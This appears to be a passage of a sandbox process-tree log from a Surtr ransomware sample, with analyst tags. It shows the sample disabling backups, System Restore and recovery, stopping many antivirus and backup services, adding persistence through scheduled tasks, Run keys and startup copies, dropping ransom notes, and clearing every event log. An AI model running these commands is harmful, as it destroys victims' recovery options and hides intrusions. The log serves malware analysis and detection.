C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableChangePassword /t REG_DWORD /d 1 /f
3⤵
PID:2928

C:\Windows\system32\reg.exe
reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableChangePassword /t REG_DWORD /d 1 /f
4⤵
PID:4352

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c net stop "Sophos System Protection Service"
3⤵
PID:1932

C:\Windows\system32\net.exe
net stop "Sophos System Protection Service"
4⤵
PID:4040

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "Sophos System Protection Service"
5⤵
PID:4336

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableLockWorkstation /t REG_DWORD /d 1 /f
3⤵
PID:748

C:\Windows\system32\reg.exe
reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableLockWorkstation /t REG_DWORD /d 1 /f
4⤵
PID:4140

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v NoLogoff /t REG_DWORD /d 1 /f
3⤵
PID:3444

C:\Windows\system32\reg.exe
reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v NoLogoff /t REG_DWORD /d 1 /f
4⤵
PID:4964

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c net stop "Sophos Web Control Service"
3⤵
PID:4464

C:\Windows\system32\net.exe
net stop "Sophos Web Control Service"
4⤵
PID:3028

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "Sophos Web Control Service"
5⤵
PID:4120

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\NonEnum /v {645FF040-5081-101B-9F08-00AA002F954E} /t REG_DWORD /d 1 /f
3⤵
PID:4156

C:\Windows\system32\reg.exe
reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\NonEnum /v {645FF040-5081-101B-9F08-00AA002F954E} /t REG_DWORD /d 1 /f
4⤵
PID:4188

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c net stop "SQLsafe Backup Service"
3⤵
PID:2456

C:\Windows\system32\net.exe
net stop "SQLsafe Backup Service"
4⤵
PID:4976

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "SQLsafe Backup Service"
5⤵
PID:5048

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\WinRE /v DisableSetup /t REG_DWORD /d 1 /f
3⤵
PID:3380

C:\Windows\system32\reg.exe
reg add HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\WinRE /v DisableSetup /t REG_DWORD /d 1 /f
4⤵
PID:3792

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v DisableConfig /t REG_DWORD /d 1 /f
3⤵
PID:2124

C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v DisableConfig /t REG_DWORD /d 1 /f
4⤵
PID:4448

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c net stop "SQLsafe Filter Service"
3⤵
PID:4052

C:\Windows\system32\net.exe
net stop "SQLsafe Filter Service"
4⤵
PID:3648

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "SQLsafe Filter Service"
5⤵
PID:608

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v DisableSR /t REG_DWORD /d 1 /f
3⤵
PID:3768

C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v DisableSR /t REG_DWORD /d 1 /f
4⤵
PID:3144

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c net stop "Symantec System Recovery"
3⤵
PID:1796

C:\Windows\system32\net.exe
net stop "Symantec System Recovery"
4⤵
PID:5072

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "Symantec System Recovery"
5⤵
PID:1936

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupToDisk /t REG_DWORD /d 1 /f
3⤵
PID:3760

C:\Windows\system32\reg.exe
reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupToDisk /t REG_DWORD /d 1 /f
4⤵
PID:3484

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupToNetwork /t REG_DWORD /d 1 /f
3⤵
PID:3624

C:\Windows\system32\reg.exe
reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupToNetwork /t REG_DWORD /d 1 /f
4⤵
PID:356

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c net stop "Veeam Backup Catalog Data Service"
3⤵
PID:2108

C:\Windows\system32\net.exe
net stop "Veeam Backup Catalog Data Service"
4⤵
PID:492

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "Veeam Backup Catalog Data Service"
5⤵
PID:4400

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupToOptical /t REG_DWORD /d 1 /f
3⤵
PID:3836

C:\Windows\system32\reg.exe
reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupToOptical /t REG_DWORD /d 1 /f
4⤵
PID:4072

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c net stop "AcronisAgent"
3⤵
PID:1528

C:\Windows\system32\net.exe
net stop "AcronisAgent"
4⤵
PID:2360

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "AcronisAgent"
5⤵
PID:4020

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupLauncher /t REG_DWORD /d 1 /f
3⤵
PID:2684

C:\Windows\system32\reg.exe
reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupLauncher /t REG_DWORD /d 1 /f
4⤵
PID:1480

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableRestoreUI /t REG_DWORD /d 1 /f
3⤵
PID:4536

C:\Windows\system32\reg.exe
reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableRestoreUI /t REG_DWORD /d 1 /f
4⤵
PID:3184

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c net stop "AcrSch2Svc"
3⤵
PID:4248

C:\Windows\system32\net.exe
net stop "AcrSch2Svc"
4⤵
PID:3424

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "AcrSch2Svc"
5⤵
PID:1148

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupUI /t REG_DWORD /d 1 /f
3⤵
PID:4652

C:\Windows\system32\reg.exe
reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupUI /t REG_DWORD /d 1 /f
4⤵
PID:4312

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableSystemBackupUI /t REG_DWORD /d 1 /f
3⤵
PID:964

C:\Windows\system32\reg.exe
reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableSystemBackupUI /t REG_DWORD /d 1 /f
4⤵
PID:4608

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c net stop "Antivirus"
3⤵
PID:4048

C:\Windows\system32\net.exe
net stop "Antivirus"
4⤵
PID:4032

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "Antivirus"
5⤵
PID:2332

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v OnlySystemBackup /t REG_DWORD /d 1 /f
3⤵
PID:1216

C:\Windows\system32\reg.exe
reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v OnlySystemBackup /t REG_DWORD /d 1 /f
4⤵
PID:1688

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v NoBackupToDisk /t REG_DWORD /d 1 /f
3⤵
PID:1648

C:\Windows\system32\reg.exe
reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v NoBackupToDisk /t REG_DWORD /d 1 /f
4⤵
PID:2104

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c net stop "BackupExecAgentAccelerator"
3⤵
PID:4180

C:\Windows\system32\net.exe
net stop "BackupExecAgentAccelerator"
4⤵
PID:4004

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "BackupExecAgentAccelerator"
5⤵
PID:692

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v NoBackupToNetwork /t REG_DWORD /d 1 /f
3⤵
PID:4268

C:\Windows\system32\reg.exe
reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v NoBackupToNetwork /t REG_DWORD /d 1 /f
4⤵
PID:5076

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v NoBackupToOptical /t REG_DWORD /d 1 /f
3⤵
PID:1484

C:\Windows\system32\reg.exe
reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v NoBackupToOptical /t REG_DWORD /d 1 /f
4⤵
PID:2952

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c net stop "BackupExecAgentBrowser"
3⤵
PID:772

C:\Windows\system32\net.exe
net stop "BackupExecAgentBrowser"
4⤵
PID:4632

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "BackupExecAgentBrowser"
5⤵
PID:4600

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v NoRunNowBackup /t REG_DWORD /d 1 /f
3⤵
PID:5104

C:\Windows\system32\reg.exe
reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v NoRunNowBackup /t REG_DWORD /d 1 /f
4⤵
PID:5060

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\WMI\Autologger\EventLog-System\{9580d7dd-0379-4658-9870-d5be7d52d6de} /v Enable /t REG_DWORD /d 0 /f
3⤵
PID:904

C:\Windows\system32\reg.exe
reg add HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\WMI\Autologger\EventLog-System\{9580d7dd-0379-4658-9870-d5be7d52d6de} /v Enable /t REG_DWORD /d 0 /f
4⤵
PID:1556

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c net stop "BackupExecDeviceMediaService"
3⤵
PID:5032

C:\Windows\system32\net.exe
net stop "BackupExecDeviceMediaService"
4⤵
PID:4492

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "BackupExecDeviceMediaService"
5⤵
PID:4456

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c mkdir "C:\ProgramData\Service"
3⤵
PID:2776

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c mkdir "%TEMP%\Service"
3⤵
PID:416

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c copy "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\SURTR_README.hta" "%appdata%\Microsoft\Windows\Start Menu\Programs\Startup\SURTR_README.hta"
3⤵
- Drops startup file
PID:932

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c copy "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\SURTR_README.txt" "%appdata%\Microsoft\Windows\Start Menu\Programs\Startup\SURTR_README.txt"
3⤵
PID:488

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c net stop "BackupExecJobEngine"
3⤵
PID:1268

C:\Windows\system32\net.exe
net stop "BackupExecJobEngine"
4⤵
PID:1220

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "BackupExecJobEngine"
5⤵
PID:3124

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c copy "C:\ProgramData\Service\Surtr.exe" "%TEMP%\Service\Surtr.exe"
3⤵
PID:344

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c net stop "BackupExecManagementService"
3⤵
PID:2452

C:\Windows\system32\net.exe
net stop "BackupExecManagementService"
4⤵
PID:4184

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "BackupExecManagementService"
5⤵
PID:4160

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c copy "C:\ProgramData\Service\Public_DATA.surt" "%TEMP%\Service\Public_DATA.surt"
3⤵
PID:4512

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c copy "C:\ProgramData\Service\Private_DATA.surt" "%TEMP%\Service\Private_DATA.surt"
3⤵
PID:4460

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c net stop "BackupExecRPCService"
3⤵
PID:5012

C:\Windows\system32\net.exe
net stop "BackupExecRPCService"
4⤵
PID:4824

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "BackupExecRPCService"
5⤵
PID:5000

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c copy "C:\ProgramData\Service\ID_DATA.surt" "%TEMP%\Service\ID_DATA.surt"
3⤵
PID:4580

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c net stop "BackupExecVSSProvider"
3⤵
PID:5112

C:\Windows\system32\net.exe
net stop "BackupExecVSSProvider"
4⤵
PID:4772

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "BackupExecVSSProvider"
5⤵
PID:4940

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c net stop "EPSecurityService"
3⤵
PID:4840

C:\Windows\system32\net.exe
net stop "EPSecurityService"
4⤵
PID:2552

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "EPSecurityService"
5⤵
PID:5088

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c copy "C:\ProgramData\Service\SURTR_README.hta" "%TEMP%\Service\SURTR_README.hta"
3⤵
PID:852

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c copy "C:\ProgramData\Service\SURTR_README.txt" "%TEMP%\Service\SURTR_README.txt"
3⤵
PID:1380

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c net stop "IISAdmin"
3⤵
PID:1036

C:\Windows\system32\net.exe
net stop "IISAdmin"
4⤵
PID:1172

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "IISAdmin"
5⤵
PID:3664

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c attrib +R /S "C:\ProgramData\Service"
3⤵
PID:1356

C:\Windows\system32\attrib.exe
attrib +R /S "C:\ProgramData\Service"
4⤵
- Views/modifies file attributes
PID:4812

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c net stop "IMAP4Svc"
3⤵
PID:1816

C:\Windows\system32\net.exe
net stop "IMAP4Svc"
4⤵
PID:2724

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "IMAP4Svc"
5⤵
PID:2140

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c attrib +R /S "%TEMP%\Service"
3⤵
PID:4900

C:\Windows\system32\attrib.exe
attrib +R /S "C:\Users\Admin\AppData\Local\Temp\Service"
4⤵
- Views/modifies file attributes
PID:264

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c net stop "macmnsvc"
3⤵
PID:2768

C:\Windows\system32\net.exe
net stop "macmnsvc"
4⤵
PID:2100

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "macmnsvc"
5⤵
PID:1488

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c schtasks /CREATE /SC ONLOGON /TN svchos1 /TR "C:\ProgramData\Service\Surtr.exe" /RU SYSTEM /RL HIGHEST /F
3⤵
PID:3496

C:\Windows\system32\schtasks.exe
schtasks /CREATE /SC ONLOGON /TN svchos1 /TR "C:\ProgramData\Service\Surtr.exe" /RU SYSTEM /RL HIGHEST /F
4⤵
- Creates scheduled task(s)
PID:1304

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c net stop "masvc"
3⤵
PID:984

C:\Windows\system32\net.exe
net stop "masvc"
4⤵
PID:268

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "masvc"
5⤵
PID:4128

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c schtasks /CREATE /SC ONLOGON /TN svchos2 /TR "C:\ProgramData\Service\Surtr.exe" /F
3⤵
PID:632

C:\Windows\system32\schtasks.exe
schtasks /CREATE /SC ONLOGON /TN svchos2 /TR "C:\ProgramData\Service\Surtr.exe" /F
4⤵
- Creates scheduled task(s)
PID:4872

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c net stop "MBAMService"
3⤵
PID:4932

C:\Windows\system32\net.exe
net stop "MBAMService"
4⤵
PID:4016

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "MBAMService"
5⤵
PID:4936

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c copy "C:\ProgramData\Service\Surtr.exe" "%appdata%\Microsoft\Windows\Start Menu\Programs\Startup\Surtr.exe"
3⤵
PID:3724

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ /v "svchos1" /t REG_SZ /d C:\ProgramData\Service\Surtr.exe /f
3⤵
PID:1752

C:\Windows\system32\reg.exe
reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ /v "svchos1" /t REG_SZ /d C:\ProgramData\Service\Surtr.exe /f
4⤵
PID:1464

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c net stop "MBEndpointAgent"
3⤵
PID:1472

C:\Windows\system32\net.exe
net stop "MBEndpointAgent"
4⤵
PID:2984

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ /v "svchos2" /t REG_SZ /d C:\ProgramData\Service\Surtr.exe /f
3⤵
PID:2324

C:\Windows\system32\reg.exe
reg add HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ /v "svchos2" /t REG_SZ /d C:\ProgramData\Service\Surtr.exe /f
4⤵
- Adds Run key to start application
PID:4952

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\ /v "svchos3" /t REG_SZ /d C:\ProgramData\Service\Surtr.exe /f
3⤵
PID:4164

C:\Windows\system32\reg.exe
reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\ /v "svchos3" /t REG_SZ /d C:\ProgramData\Service\Surtr.exe /f
4⤵
- Adds Run key to start application
PID:4392

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c net stop "McAfeeEngineService"
3⤵
PID:4948

C:\Windows\system32\net.exe
net stop "McAfeeEngineService"
4⤵
PID:1940

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "McAfeeEngineService"
5⤵
PID:4080

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\ /v "svchos4" /t REG_SZ /d C:\ProgramData\Service\Surtr.exe /f
3⤵
PID:4296

C:\Windows\system32\reg.exe
reg add HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\ /v "svchos4" /t REG_SZ /d C:\ProgramData\Service\Surtr.exe /f
4⤵
PID:3620

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c net stop "McAfeeFramework"
3⤵
PID:4992

C:\Windows\system32\net.exe
net stop "McAfeeFramework"
4⤵
PID:4040

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "McAfeeFramework"
5⤵
PID:3444

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c copy "%TEMP%\Service\Private_DATA.surt" "%USERPROFILE%\Desktop\Private_DATA.surt"
3⤵
PID:4468

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c net stop "McAfeeFrameworkMcAfeeFramework"
3⤵
PID:4968

C:\Windows\system32\net.exe
net stop "McAfeeFrameworkMcAfeeFramework"
4⤵
PID:4416

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "McAfeeFrameworkMcAfeeFramework"
5⤵
PID:4476

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c copy "%TEMP%\Service\ID_DATA.surt" "%USERPROFILE%\Desktop\ID_DATA.surt"
3⤵
PID:3028

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c copy "%TEMP%\Service\SURTR_README.hta" "%USERPROFILE%\Desktop\SURTR_README.hta"
3⤵
PID:4396

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c copy "%TEMP%\Service\Service\SURTR_README.txt" "%USERPROFILE%\Desktop\SURTR_README.txt"
3⤵
PID:3380

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c net stop "McShield"
3⤵
PID:4976

C:\Windows\system32\net.exe
net stop "McShield"
4⤵
PID:4256

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "McShield"
5⤵
PID:3864

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c for /F "tokens=*" %s in ('wevtutil.exe el') DO wevtutil.exe cl "%s"
3⤵
PID:1676

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wevtutil.exe el
4⤵
PID:3648

C:\Windows\system32\wevtutil.exe
wevtutil.exe el
5⤵
PID:3320

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "AirSpaceChannel"
4⤵
PID:4528

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Analytic"
4⤵
- Suspicious use of AdjustPrivilegeToken
PID:2616

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Application"
4⤵
PID:3048

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "DirectShowFilterGraph"
4⤵
PID:4628

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "DirectShowPluginControl"
4⤵
PID:4608

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Els_Hyphenation/Analytic"
4⤵
PID:4548

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "EndpointMapper"
4⤵
PID:3860

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "FirstUXPerf-Analytic"
4⤵
PID:1780

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "ForwardedEvents"
4⤵
PID:4180

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "General Logging"
4⤵
PID:5056

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "HardwareEvents"
4⤵
PID:2320

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "IHM_DebugChannel"
4⤵
- Suspicious use of AdjustPrivilegeToken
PID:5092

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Intel-iaLPSS-GPIO/Analytic"
4⤵
- Suspicious use of AdjustPrivilegeToken
PID:1608

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Intel-iaLPSS-I2C/Analytic"
4⤵
PID:1380

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Intel-iaLPSS2-GPIO2/Debug"
4⤵
- Suspicious use of AdjustPrivilegeToken
PID:4812

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Intel-iaLPSS2-GPIO2/Performance"
4⤵
PID:4892

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Intel-iaLPSS2-I2C/Debug"
4⤵
PID:3240

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Intel-iaLPSS2-I2C/Performance"
4⤵
- Suspicious use of AdjustPrivilegeToken
PID:284

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Internet Explorer"
4⤵
PID:1488

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Key Management Service"
4⤵
PID:4868

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "MF_MediaFoundationDeviceProxy"
4⤵
PID:3088

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "MedaFoundationVideoProc"
4⤵
PID:3984

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "MedaFoundationVideoProcD3D"
4⤵
- Suspicious use of AdjustPrivilegeToken
PID:4080

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "MediaFoundationAsyncWrapper"
4⤵
- Suspicious use of AdjustPrivilegeToken
PID:4996

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "MediaFoundationContentProtection"
4⤵
- Suspicious use of AdjustPrivilegeToken
PID:4336

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "MediaFoundationDS"
4⤵
PID:4352

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "MediaFoundationDeviceProxy"
4⤵
PID:4112

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "MediaFoundationMediaEngine"
4⤵
PID:3040

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "MediaFoundationPerformance"
4⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:4236

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "MediaFoundationPerformanceCore"
4⤵
PID:4476

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "MediaFoundationPipeline"
4⤵
PID:3792

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "MediaFoundationPlatform"
4⤵
PID:2964

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "MediaFoundationSrcPrefetch"
4⤵
PID:2456

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-AppV-Client-Streamingux/Debug"
4⤵
PID:2224

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-AppV-Client/Admin"
4⤵
PID:3144

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-AppV-Client/Debug"
4⤵
PID:4756

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-AppV-Client/Operational"
4⤵
PID:5080

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-AppV-Client/Virtual Applications"
4⤵
PID:4860

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-AppV-SharedPerformance/Analytic"
4⤵
PID:5088

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Client-Licensing-Platform/Admin"
4⤵
PID:4128

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Client-Licensing-Platform/Debug"
4⤵
PID:4872

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Client-Licensing-Platform/Diagnostic"
4⤵
- Suspicious use of AdjustPrivilegeToken
PID:4868

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-IE/Diagnostic"
4⤵
PID:1336

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-IEFRAME/Diagnostic"
4⤵
PID:920

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-JSDumpHeap/Diagnostic"
4⤵
PID:4164

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-OneCore-Setup/Analytic"
4⤵
PID:4960

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-PerfTrack-IEFRAME/Diagnostic"
4⤵
PID:4296

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-PerfTrack-MSHTML/Diagnostic"
4⤵
PID:4112

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-User Experience Virtualization-Admin/Debug"
4⤵
PID:636

C:\Windows\system32\wevtutil.exe
